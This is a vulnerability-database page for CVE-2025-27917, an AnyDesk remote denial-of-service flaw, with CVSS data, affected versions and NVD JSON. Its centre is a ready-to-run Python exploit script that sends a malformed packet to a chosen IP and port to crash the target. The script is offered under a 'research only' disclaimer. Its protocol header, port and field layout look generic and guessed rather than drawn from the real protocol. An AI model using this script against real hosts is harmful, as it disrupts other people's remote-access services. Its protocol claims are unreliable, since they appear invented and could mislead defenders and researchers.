Security Vulnerability Report
中文
CVE-2025-27917 CVSS 7.5 HIGH

CVE-2025-27917

Published: 2025-11-06 18:15:41
Last Modified: 2025-12-08 17:16:13
Source: [email protected]

Description

An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. Remote Denial of Service can occur because of incorrect deserialization that results in failed memory allocation and a NULL pointer dereference.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* - VULNERABLE
AnyDesk for Windows < 9.0.5
AnyDesk for macOS < 9.0.1
AnyDesk for Linux < 7.0.0
AnyDesk for iOS < 7.1.2
AnyDesk for Android < 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-27917 PoC - AnyDesk Remote Denial of Service Description: Exploits incorrect deserialization leading to NULL pointer dereference Author: Security Research Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-27917 """ import socket import struct import sys def create_malicious_payload(): """ Construct malformed serialized data to trigger deserialization vulnerability This payload targets the memory allocation failure and NULL pointer dereference """ # AnyDesk protocol header header = b'ADSP' # AnyDesk Service Protocol signature # Version and type fields version = struct.pack('<H', 1) # Protocol version msg_type = struct.pack('<H', 0x0010) # Control message type # Malformed payload designed to cause memory allocation failure # Invalid object length that triggers integer overflow in size calculation invalid_length = struct.pack('<I', 0xFFFFFFFF) # Max uint32 value # Corrupted object type identifier object_type = struct.pack('<B', 0xFF) # Invalid type byte # Padding with specific byte pattern to trigger parsing error padding = b'\x00' * 64 + b'\xFF' * 32 # Construct final payload payload = header + version + msg_type + invalid_length + object_type + padding return payload def exploit_anydesk(target_host, target_port=6566): """ Send malicious payload to trigger DoS condition Args: target_host: Target AnyDesk server or client IP target_port: AnyDesk service port (default: 6566) Returns: bool: True if payload sent successfully """ try: print(f'[*] Target: {target_host}:{target_port}') print('[*] Creating malicious payload for CVE-2025-27917...') payload = create_malicious_payload() print(f'[*] Payload size: {len(payload)} bytes') print('[*] Establishing connection...') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) print('[*] Sending malicious payload...') sock.send(payload) print('[+] Payload sent successfully') print('[!] Target should crash due to NULL pointer dereference') sock.close() return True except socket.timeout: print('[-] Connection timed out') return False except socket.error as e: print(f'[-] Socket error: {e}') return False except Exception as e: print(f'[-] Unexpected error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip> [port]') print(f'Example: {sys.argv[0]} 192.168.1.100 6566') sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 6566 exploit_anydesk(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27917", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.637", "lastModified": "2025-12-08T17:16:13.437", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. Remote Denial of Service can occur because of incorrect deserialization that results in failed memory allocation and a NULL pointer dereference."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndIncluding": "9.0.4", "matchCriteriaId": "2BB8EC40-287D-4733-B2DF-B86909680119"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.